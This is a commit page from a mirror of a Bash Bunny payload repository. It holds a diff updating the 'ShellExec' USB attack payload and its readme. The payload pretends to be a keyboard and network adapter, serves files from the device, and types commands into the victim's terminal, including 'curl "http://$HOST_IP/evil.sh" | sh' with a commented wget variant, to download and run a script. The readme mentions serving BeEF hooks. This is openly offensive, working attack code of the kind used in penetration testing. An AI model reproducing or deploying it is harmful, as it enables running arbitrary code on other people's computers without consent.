hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

updates shellexec for bashbunny fw1.1 (#203)

Browse Source
This commit is contained in:
Alex Flores 2017-04-26 17:03:57 -10:00 committed by Sebastian Kinne
parent 9efc5e95a0
commit 22cbf92a3b
2 changed files with 22 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

39
payloads/library/execution/ShellExec/payload.txt
View File

@ -3,20 +3,22 @@
# Title: ShellExec
# Author: audibleblink
# Target: Mac/Linux
# Version: 1.0
# Version: 1.1
#
# Create a web server on the BashBunny and forces
# the victim download and execute a script.
# Create a web server on the BashBunny and force
# the victim to download and execute a script.
# Perfect for when mass storage isn't an option.
#
# White | Ready
# Ammber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
LED R G B
LED SETUP
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
source bunny_helpers.sh
GET SWITCH_POSITION
GET HOST_IP
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
log_file=$payload_dir/shellexec.log
@ -24,7 +26,7 @@ log_file=$payload_dir/shellexec.log
cd $payload_dir
# starting server
LED R G 500
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
@ -34,21 +36,18 @@ python -m SimpleHTTPServer 80
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED B 500
LED ATTACK
Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 100
Q ENTER
Q DELAY 2000
# macOS
QUACK RUN OSX terminal
QUACK DELAY 2000
# Q ALT F2 # swap with block above for linux
# Q DELAY 100
# ubunutu
# QUACK RUN UNITY xterm
# QUACK DELAY 2000
Q STRING curl "http://$HOST_IP/evil.sh" \| sh
QUACK STRING curl "http://$HOST_IP/evil.sh" \| sh
# in case curl isn't installed
# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
Q ENTER
LED G
# QUACK STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
QUACK ENTER
LED SUCCESS

4
payloads/library/execution/ShellExec/readme.md
View File

@ -1,7 +1,7 @@
# ShellExec
Author: audibleblink
Version: 1.0
Version: 1.1
## Description
@ -10,6 +10,8 @@ victims to curl and execute those scripts. Scripts can also force
browsers to open a url on the bunny to do things like serve BeEF
hooks.
Perfect for when mass storage isn't an option.
## Configuration
evil.py - script that is fetched with DuckyScript